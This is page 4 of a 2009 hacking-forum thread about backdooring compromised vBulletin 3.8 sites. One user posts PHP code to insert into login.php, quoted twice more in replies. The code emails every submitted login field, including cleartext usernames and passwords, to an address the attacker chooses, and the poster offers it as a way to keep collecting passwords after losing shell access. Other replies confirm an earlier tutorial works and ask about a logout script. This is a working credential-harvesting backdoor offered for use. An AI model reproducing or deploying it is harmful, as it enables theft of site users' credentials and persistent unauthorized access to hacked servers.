 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 Posted: Wed Mar 04, 2009 5:59 pm |
 |
|
| Parted |
| Beginner |
 |
|
| Joined: Mar 04, 2009 |
| Posts: 1 |
|
|
|
 |
|
 |
|
Working great on Vb3.8.* also. Great tutorial. Thx  |
|
|
|
|
 |
nice.. working 100% in 3.8.1 |
 |
| Posted: Tue Apr 14, 2009 3:26 pm |
|
|
| transfer |
| Regular user |
|
|
| Joined: Apr 14, 2009 |
| Posts: 11 |
|
|
|
|
|
|
|
| nice.. working 100% in 3.8.1 |
|
|
|
|
| Posted: Thu Apr 30, 2009 4:23 am |
|
|
| Overhit |
| Beginner |
|
|
| Joined: Apr 30, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
Working on 3.8.1
This site is screwed. |
|
|
|
|
|
|
|
|
| Posted: Fri Sep 25, 2009 11:46 am |
|
|
| Bigdeal |
| Beginner |
|
|
| Joined: Sep 04, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
Theres a simpler way, open an mail addy where you want to send logins too...
In login.php you will c:
| Code: |
// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));
// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} |
Straight under that add this...
| Code: | $email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); } |
Then all clear text login usernames and passwords are sent to the email address you specify..
This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^
Regards
U1 |
|
|
|
|
|
|
|
|
| Posted: Sat Sep 26, 2009 9:30 pm |
|
|
| tError |
| Regular user |
 |
|
| Joined: Jul 23, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Sep 29, 2009 10:05 am |
|
|
| Sleeper |
| Regular user |
|
|
| Joined: Jan 04, 2009 |
| Posts: 12 |
| Location: Earth |
|
|
|
|
|
|
| Bigdeal wrote: | Theres a simpler way, open an mail addy where you want to send logins too...
In login.php you will c:
| Code: |
// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));
// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} |
Straight under that add this...
| Code: | $email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); } |
Then all clear text login usernames and passwords are sent to the email address you specify..
This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^
Regards
U1 |
So do we ONLY need to use JUST THIS CODE or do we still need to use your code in conjunction with the other code that tr0nix posted? |
|
|
|
|
|
|
|
|
| Posted: Wed Sep 30, 2009 1:51 am |
|
|
| Bigdeal |
| Beginner |
|
|
| Joined: Sep 04, 2009 |
| Posts: 3 |
|
|
|
|
|
|
|
| Sleeper wrote: | | Bigdeal wrote: | Theres a simpler way, open an mail addy where you want to send logins too...
In login.php you will c:
| Code: |
// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
$vbulletin->input->clean_array_gpc('p', array(
'vb_login_username' => TYPE_STR,
'vb_login_password' => TYPE_STR,
'vb_login_md5password' => TYPE_STR,
'vb_login_md5password_utf' => TYPE_STR,
'postvars' => TYPE_BINARY,
'cookieuser' => TYPE_BOOL,
'logintype' => TYPE_STR,
'cssprefs' => TYPE_STR,
));
// can the user login?
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
if ($vbulletin->GPC['vb_login_username'] == '')
{
eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
} |
Straight under that add this...
| Code: | $email = $HTTP_POST_VARS[email];
$mailto = "YOUR EMAIL ADDY HERE";
$mailsubj = "Form submission hacked site";
$mailhead = "From: $email\n";
reset ($HTTP_POST_VARS);
$mailbody = "Values submitted from web site form:\n";
while (list ($key, $val) = each ($HTTP_POST_VARS)) { $mailbody .= "$key : $val\n"; }
if (!eregi("\n",$HTTP_POST_VARS[email])) { mail($mailto, $mailsubj, $mailbody, $mailhead); } |
Then all clear text login usernames and passwords are sent to the email address you specify..
This is probably a better way as all servers has different permissions and most of the time you cant write to files, so this way atleast if you loose shell you still got there passwords coming to your email addy ^^
Regards
U1 |
So do we ONLY need to use JUST THIS CODE or do we still need to use your code in conjunction with the other code that tr0nix posted? |
You only need to use my code nothing else... =) |
|
|
|
|
|
|
|
|
| Posted: Tue Feb 02, 2010 8:42 pm |
|
|
| SaiYan |
| Beginner |
|
|
| Joined: Feb 02, 2010 |
| Posts: 1 |
|
|
|
|
|
|
|
Hi, sorry i up the subject because i have a problem to the logout script.
The tr0nix's logout script is working on Firefox but it doesn't on IE and Google Chrome.
It's the same with the Sleeper's logout script. And i don't understand the modification of tr0nix who works for Sleeper. Why change the script after a reload ?
Can you help me please.
SaiYan.
ps : sorry for my bad english i'm french  |
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 4 of 4
Goto page Previous1, 2, 3, 4
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 63
Members: 0
Total: 63
